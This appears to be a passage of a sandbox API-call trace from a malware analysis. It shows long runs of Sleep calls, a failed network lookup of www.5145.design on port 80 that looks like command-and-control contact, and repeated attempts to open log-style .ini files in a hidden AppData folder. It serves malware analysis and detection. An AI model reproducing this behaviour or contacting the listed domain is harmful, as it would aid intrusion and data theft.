[0144.189] Sleep (dwMilliseconds=0x7d0) [0144.190] Sleep (dwMilliseconds=0x7d0) [0144.192] Sleep (dwMilliseconds=0x7d0) [0144.193] Sleep (dwMilliseconds=0x7d0) [0144.195] Sleep (dwMilliseconds=0x7d0) [0144.196] Sleep (dwMilliseconds=0x7d0) [0144.198] Sleep (dwMilliseconds=0x7d0) [0144.199] Sleep (dwMilliseconds=0x7d0) [0144.201] Sleep (dwMilliseconds=0x7d0) [0144.202] Sleep (dwMilliseconds=0x7d0) [0144.203] Sleep (dwMilliseconds=0x7d0) [0144.205] Sleep (dwMilliseconds=0x7d0) [0144.207] Sleep (dwMilliseconds=0x7d0) [0144.208] Sleep (dwMilliseconds=0x7d0) [0144.210] Sleep (dwMilliseconds=0x7d0) [0144.211] Sleep (dwMilliseconds=0x7d0) [0144.212] Sleep (dwMilliseconds=0x7d0) [0144.214] Sleep (dwMilliseconds=0x7d0) [0144.215] Sleep (dwMilliseconds=0x7d0) [0144.217] Sleep (dwMilliseconds=0x7d0) [0144.218] Sleep (dwMilliseconds=0x7d0) [0144.220] Sleep (dwMilliseconds=0x7d0) [0144.222] Sleep (dwMilliseconds=0x7d0) [0144.223] Sleep (dwMilliseconds=0x7d0) [0144.224] Sleep (dwMilliseconds=0x7d0) [0144.226] Sleep (dwMilliseconds=0x7d0) [0144.228] Sleep (dwMilliseconds=0x7d0) [0144.229] Sleep (dwMilliseconds=0x7d0) [0144.230] Sleep (dwMilliseconds=0x7d0) [0144.234] Sleep (dwMilliseconds=0x7d0) [0144.237] Sleep (dwMilliseconds=0x7d0) [0144.239] Sleep (dwMilliseconds=0x7d0) [0144.240] Sleep (dwMilliseconds=0x7d0) [0144.242] Sleep (dwMilliseconds=0x7d0) [0144.243] Sleep (dwMilliseconds=0x7d0) [0144.245] Sleep (dwMilliseconds=0x7d0) [0144.246] Sleep (dwMilliseconds=0x7d0) [0144.254] Sleep (dwMilliseconds=0x7d0) [0144.256] Sleep (dwMilliseconds=0x7d0) [0144.258] Sleep (dwMilliseconds=0x7d0) [0144.259] Sleep (dwMilliseconds=0x7d0) [0144.261] Sleep (dwMilliseconds=0x7d0) [0144.262] Sleep (dwMilliseconds=0x7d0) [0144.264] Sleep (dwMilliseconds=0x7d0) [0144.265] Sleep (dwMilliseconds=0x7d0) [0144.267] Sleep (dwMilliseconds=0x7d0) [0144.268] Sleep (dwMilliseconds=0x7d0) [0144.270] Sleep (dwMilliseconds=0x7d0) [0144.271] Sleep (dwMilliseconds=0x7d0) [0144.273] Sleep (dwMilliseconds=0x7d0) [0144.274] Sleep (dwMilliseconds=0x7d0) [0144.275] Sleep (dwMilliseconds=0x7d0) [0144.277] Sleep (dwMilliseconds=0x7d0) [0144.278] Sleep (dwMilliseconds=0x7d0) [0144.282] Sleep (dwMilliseconds=0x7d0) [0144.286] Sleep (dwMilliseconds=0x7d0) [0144.289] Sleep (dwMilliseconds=0x7d0) [0144.293] Sleep (dwMilliseconds=0x7d0) [0144.296] Sleep (dwMilliseconds=0x7d0) [0144.297] Sleep (dwMilliseconds=0x7d0) [0144.301] Sleep (dwMilliseconds=0x7d0) [0144.304] Sleep (dwMilliseconds=0x7d0) [0144.308] Sleep (dwMilliseconds=0x7d0) [0144.312] Sleep (dwMilliseconds=0x7d0) [0144.314] Sleep (dwMilliseconds=0x7d0) [0144.315] Sleep (dwMilliseconds=0x7d0) [0144.317] Sleep (dwMilliseconds=0x7d0) [0144.318] Sleep (dwMilliseconds=0x7d0) [0144.320] Sleep (dwMilliseconds=0x7d0) [0144.322] Sleep (dwMilliseconds=0x7d0) [0144.323] Sleep (dwMilliseconds=0x7d0) [0144.325] Sleep (dwMilliseconds=0x7d0) [0144.326] Sleep (dwMilliseconds=0x7d0) [0144.327] Sleep (dwMilliseconds=0x7d0) [0144.329] Sleep (dwMilliseconds=0x7d0) [0144.331] Sleep (dwMilliseconds=0x7d0) [0144.333] Sleep (dwMilliseconds=0x7d0) [0144.335] Sleep (dwMilliseconds=0x7d0) [0144.336] Sleep (dwMilliseconds=0x7d0) [0144.338] Sleep (dwMilliseconds=0x7d0) [0144.339] Sleep (dwMilliseconds=0x7d0) [0144.341] Sleep (dwMilliseconds=0x7d0) [0144.342] Sleep (dwMilliseconds=0x7d0) [0144.344] Sleep (dwMilliseconds=0x7d0) [0144.345] Sleep (dwMilliseconds=0x7d0) [0144.347] Sleep (dwMilliseconds=0x7d0) [0144.348] Sleep (dwMilliseconds=0x7d0) [0144.349] Sleep (dwMilliseconds=0x7d0) [0144.351] Sleep (dwMilliseconds=0x7d0) [0144.353] Sleep (dwMilliseconds=0x7d0) [0144.354] Sleep (dwMilliseconds=0x7d0) [0144.356] Sleep (dwMilliseconds=0x7d0) [0144.357] Sleep (dwMilliseconds=0x7d0) [0144.359] Sleep (dwMilliseconds=0x7d0) [0144.360] Sleep (dwMilliseconds=0x7d0) [0144.362] Sleep (dwMilliseconds=0x7d0) [0144.363] Sleep (dwMilliseconds=0x7d0) [0144.365] Sleep (dwMilliseconds=0x7d0) [0144.366] Sleep (dwMilliseconds=0x7d0) [0144.367] Sleep (dwMilliseconds=0x7d0) [0144.369] Sleep (dwMilliseconds=0x7d0) [0144.370] Sleep (dwMilliseconds=0x7d0) [0144.372] Sleep (dwMilliseconds=0x7d0) [0144.375] Sleep (dwMilliseconds=0x7d0) [0144.376] Sleep (dwMilliseconds=0x7d0) [0144.377] Sleep (dwMilliseconds=0x7d0) [0144.379] Sleep (dwMilliseconds=0x7d0) [0144.381] Sleep (dwMilliseconds=0x7d0) [0144.382] Sleep (dwMilliseconds=0x7d0) [0144.384] Sleep (dwMilliseconds=0x7d0) [0144.385] Sleep (dwMilliseconds=0x7d0) [0144.387] Sleep (dwMilliseconds=0x7d0) [0144.388] Sleep (dwMilliseconds=0x7d0) [0144.389] Sleep (dwMilliseconds=0x7d0) [0144.391] Sleep (dwMilliseconds=0x7d0) [0144.393] Sleep (dwMilliseconds=0x7d0) [0144.394] Sleep (dwMilliseconds=0x7d0) [0144.395] Sleep (dwMilliseconds=0x7d0) [0144.397] Sleep (dwMilliseconds=0x7d0) [0144.399] Sleep (dwMilliseconds=0x7d0) [0144.400] Sleep (dwMilliseconds=0x7d0) [0144.402] Sleep (dwMilliseconds=0x7d0) [0144.403] Sleep (dwMilliseconds=0x7d0) [0144.404] Sleep (dwMilliseconds=0x7d0) [0144.406] Sleep (dwMilliseconds=0x7d0) [0144.407] Sleep (dwMilliseconds=0x7d0) [0144.409] Sleep (dwMilliseconds=0x7d0) [0144.411] Sleep (dwMilliseconds=0x7d0) [0144.412] Sleep (dwMilliseconds=0x7d0) [0144.414] Sleep (dwMilliseconds=0x7d0) [0144.415] Sleep (dwMilliseconds=0x7d0) [0144.417] Sleep (dwMilliseconds=0x7d0) [0144.418] Sleep (dwMilliseconds=0x7d0) [0144.421] Sleep (dwMilliseconds=0x7d0) [0144.423] Sleep (dwMilliseconds=0x7d0) [0144.424] Sleep (dwMilliseconds=0x7d0) [0144.425] Sleep (dwMilliseconds=0x7d0) [0144.427] Sleep (dwMilliseconds=0x7d0) [0144.428] Sleep (dwMilliseconds=0x7d0) [0144.430] Sleep (dwMilliseconds=0x7d0) [0144.439] Sleep (dwMilliseconds=0x7d0) [0144.440] Sleep (dwMilliseconds=0x7d0) [0144.441] Sleep (dwMilliseconds=0x7d0) [0144.460] Sleep (dwMilliseconds=0x7d0) [0144.461] Sleep (dwMilliseconds=0x7d0) [0144.463] Sleep (dwMilliseconds=0x7d0) [0144.464] Sleep (dwMilliseconds=0x7d0) [0144.466] Sleep (dwMilliseconds=0x7d0) [0144.467] Sleep (dwMilliseconds=0x7d0) [0144.469] Sleep (dwMilliseconds=0x7d0) [0144.470] Sleep (dwMilliseconds=0x7d0) [0144.472] Sleep (dwMilliseconds=0x7d0) [0144.473] Sleep (dwMilliseconds=0x7d0) [0144.475] Sleep (dwMilliseconds=0x7d0) [0144.476] Sleep (dwMilliseconds=0x7d0) [0144.478] Sleep (dwMilliseconds=0x7d0) [0144.479] Sleep (dwMilliseconds=0x7d0) [0144.481] Sleep (dwMilliseconds=0x7d0) [0144.482] Sleep (dwMilliseconds=0x7d0) [0144.484] Sleep (dwMilliseconds=0x7d0) [0144.485] Sleep (dwMilliseconds=0x7d0) [0144.487] Sleep (dwMilliseconds=0x7d0) [0144.488] Sleep (dwMilliseconds=0x7d0) [0144.489] Sleep (dwMilliseconds=0x7d0) [0144.491] Sleep (dwMilliseconds=0x7d0) [0144.492] Sleep (dwMilliseconds=0x7d0) [0144.494] Sleep (dwMilliseconds=0x7d0) [0144.495] Sleep (dwMilliseconds=0x7d0) [0144.497] Sleep (dwMilliseconds=0x7d0) [0144.499] Sleep (dwMilliseconds=0x7d0) [0144.500] Sleep (dwMilliseconds=0x7d0) [0144.501] Sleep (dwMilliseconds=0x7d0) [0144.503] Sleep (dwMilliseconds=0x7d0) [0144.504] Sleep (dwMilliseconds=0x7d0) [0144.506] Sleep (dwMilliseconds=0x7d0) [0144.507] Sleep (dwMilliseconds=0x7d0) [0144.509] Sleep (dwMilliseconds=0x7d0) [0144.511] Sleep (dwMilliseconds=0x7d0) [0144.512] Sleep (dwMilliseconds=0x7d0) [0144.513] Sleep (dwMilliseconds=0x7d0) [0144.515] Sleep (dwMilliseconds=0x7d0) [0144.516] Sleep (dwMilliseconds=0x7d0) [0144.518] Sleep (dwMilliseconds=0x7d0) [0144.519] Sleep (dwMilliseconds=0x7d0) [0144.521] Sleep (dwMilliseconds=0x7d0) [0144.522] Sleep (dwMilliseconds=0x7d0) [0144.524] Sleep (dwMilliseconds=0x7d0) [0144.525] Sleep (dwMilliseconds=0x7d0) [0144.527] Sleep (dwMilliseconds=0x7d0) [0144.528] Sleep (dwMilliseconds=0x7d0) [0144.610] Sleep (dwMilliseconds=0x7d0) [0144.611] Sleep (dwMilliseconds=0x7d0) [0144.613] Sleep (dwMilliseconds=0x7d0) [0144.614] Sleep (dwMilliseconds=0x7d0) [0144.616] Sleep (dwMilliseconds=0x7d0) [0144.617] Sleep (dwMilliseconds=0x7d0) [0144.619] Sleep (dwMilliseconds=0x7d0) [0144.621] Sleep (dwMilliseconds=0x7d0) [0144.622] Sleep (dwMilliseconds=0x7d0) [0144.623] Sleep (dwMilliseconds=0x7d0) [0144.625] Sleep (dwMilliseconds=0x7d0) [0144.626] Sleep (dwMilliseconds=0x7d0) [0144.628] Sleep (dwMilliseconds=0x7d0) [0144.629] Sleep (dwMilliseconds=0x7d0) [0144.631] Sleep (dwMilliseconds=0x7d0) [0144.633] Sleep (dwMilliseconds=0x7d0) [0144.634] Sleep (dwMilliseconds=0x7d0) [0144.636] Sleep (dwMilliseconds=0x7d0) [0144.637] Sleep (dwMilliseconds=0x7d0) [0144.640] Sleep (dwMilliseconds=0x7d0) [0144.707] Sleep (dwMilliseconds=0x7d0) [0144.708] Sleep (dwMilliseconds=0x7d0) [0144.709] Sleep (dwMilliseconds=0x7d0) [0144.711] Sleep (dwMilliseconds=0x7d0) [0144.713] Sleep (dwMilliseconds=0x7d0) [0144.714] Sleep (dwMilliseconds=0x7d0) [0144.715] Sleep (dwMilliseconds=0x7d0) [0144.717] Sleep (dwMilliseconds=0x7d0) [0144.718] Sleep (dwMilliseconds=0x7d0) [0144.720] Sleep (dwMilliseconds=0x7d0) [0144.722] Sleep (dwMilliseconds=0x7d0) [0144.723] Sleep (dwMilliseconds=0x7d0) [0144.725] Sleep (dwMilliseconds=0x7d0) [0144.726] Sleep (dwMilliseconds=0x7d0) [0144.727] Sleep (dwMilliseconds=0x7d0) [0144.729] Sleep (dwMilliseconds=0x7d0) [0144.731] Sleep (dwMilliseconds=0x7d0) [0144.732] Sleep (dwMilliseconds=0x7d0) [0144.733] Sleep (dwMilliseconds=0x7d0) [0144.761] Sleep (dwMilliseconds=0x7d0) [0144.762] Sleep (dwMilliseconds=0x7d0) [0144.764] Sleep (dwMilliseconds=0x7d0) [0144.765] Sleep (dwMilliseconds=0x7d0) [0144.767] Sleep (dwMilliseconds=0x7d0) [0144.768] Sleep (dwMilliseconds=0x7d0) [0144.770] Sleep (dwMilliseconds=0x7d0) [0144.771] Sleep (dwMilliseconds=0x7d0) [0144.773] Sleep (dwMilliseconds=0x7d0) [0144.774] Sleep (dwMilliseconds=0x7d0) [0144.776] Sleep (dwMilliseconds=0x7d0) [0144.778] Sleep (dwMilliseconds=0x7d0) [0144.779] Sleep (dwMilliseconds=0x7d0) [0144.781] Sleep (dwMilliseconds=0x7d0) [0144.782] Sleep (dwMilliseconds=0x7d0) [0144.784] Sleep (dwMilliseconds=0x7d0) [0144.786] Sleep (dwMilliseconds=0x7d0) [0144.787] Sleep (dwMilliseconds=0x7d0) [0144.788] Sleep (dwMilliseconds=0x7d0) [0144.790] Sleep (dwMilliseconds=0x7d0) [0144.791] Sleep (dwMilliseconds=0x7d0) [0144.793] Sleep (dwMilliseconds=0x7d0) [0144.794] Sleep (dwMilliseconds=0x7d0) [0144.796] Sleep (dwMilliseconds=0x7d0) [0144.797] Sleep (dwMilliseconds=0x7d0) [0144.799] Sleep (dwMilliseconds=0x7d0) [0144.800] Sleep (dwMilliseconds=0x7d0) [0144.802] Sleep (dwMilliseconds=0x7d0) [0144.803] Sleep (dwMilliseconds=0x7d0) [0144.805] Sleep (dwMilliseconds=0x7d0) [0144.806] Sleep (dwMilliseconds=0x7d0) [0144.808] Sleep (dwMilliseconds=0x7d0) [0144.809] Sleep (dwMilliseconds=0x7d0) [0144.811] Sleep (dwMilliseconds=0x7d0) [0144.813] Sleep (dwMilliseconds=0x7d0) [0144.814] Sleep (dwMilliseconds=0x7d0) [0144.815] Sleep (dwMilliseconds=0x7d0) [0144.817] Sleep (dwMilliseconds=0x7d0) [0144.819] Sleep (dwMilliseconds=0x7d0) [0144.821] Sleep (dwMilliseconds=0x7d0) [0144.823] Sleep (dwMilliseconds=0x7d0) [0144.824] Sleep (dwMilliseconds=0x7d0) [0144.825] Sleep (dwMilliseconds=0x7d0) [0144.827] Sleep (dwMilliseconds=0x7d0) [0144.828] Sleep (dwMilliseconds=0x7d0) [0144.830] Sleep (dwMilliseconds=0x7d0) [0144.831] Sleep (dwMilliseconds=0x7d0) [0144.833] Sleep (dwMilliseconds=0x7d0) [0144.834] Sleep (dwMilliseconds=0x7d0) [0144.836] Sleep (dwMilliseconds=0x7d0) [0144.837] Sleep (dwMilliseconds=0x7d0) [0144.839] Sleep (dwMilliseconds=0x7d0) [0144.841] Sleep (dwMilliseconds=0x7d0) [0144.843] Sleep (dwMilliseconds=0x7d0) [0144.844] Sleep (dwMilliseconds=0x7d0) [0144.846] Sleep (dwMilliseconds=0x7d0) [0144.847] Sleep (dwMilliseconds=0x7d0) [0144.849] Sleep (dwMilliseconds=0x7d0) [0144.851] Sleep (dwMilliseconds=0x7d0) [0144.852] Sleep (dwMilliseconds=0x7d0) [0144.854] Sleep (dwMilliseconds=0x7d0) [0144.856] Sleep (dwMilliseconds=0x7d0) [0144.857] Sleep (dwMilliseconds=0x7d0) [0144.859] socket (af=2, type=1, protocol=6) returned 0x24cc [0144.860] getaddrinfo (in: pNodeName="www.5145.design", pServiceName="80", pHints=0x878f758*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878f788 | out: ppResult=0x878f788*=0x0) returned 11001 [0145.165] Sleep (dwMilliseconds=0x7d0) [0145.166] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.166] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.167] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0145.167] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f340) returned 1 [0145.167] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.167] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.167] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.167] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f3d0) returned 1 [0145.167] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.167] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.167] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.167] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894efe0) returned 1 [0145.167] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.167] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.168] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.168] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f730) returned 1 [0145.168] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.168] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.168] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.168] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f460) returned 1 [0145.168] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.168] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.168] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.168] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ef50) returned 1 [0145.168] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.168] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.168] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.168] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fc40) returned 1 [0145.168] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.168] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.169] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.169] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ef50) returned 1 [0145.169] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.169] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0145.169] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0145.169] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fa00) returned 1 [0145.169] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 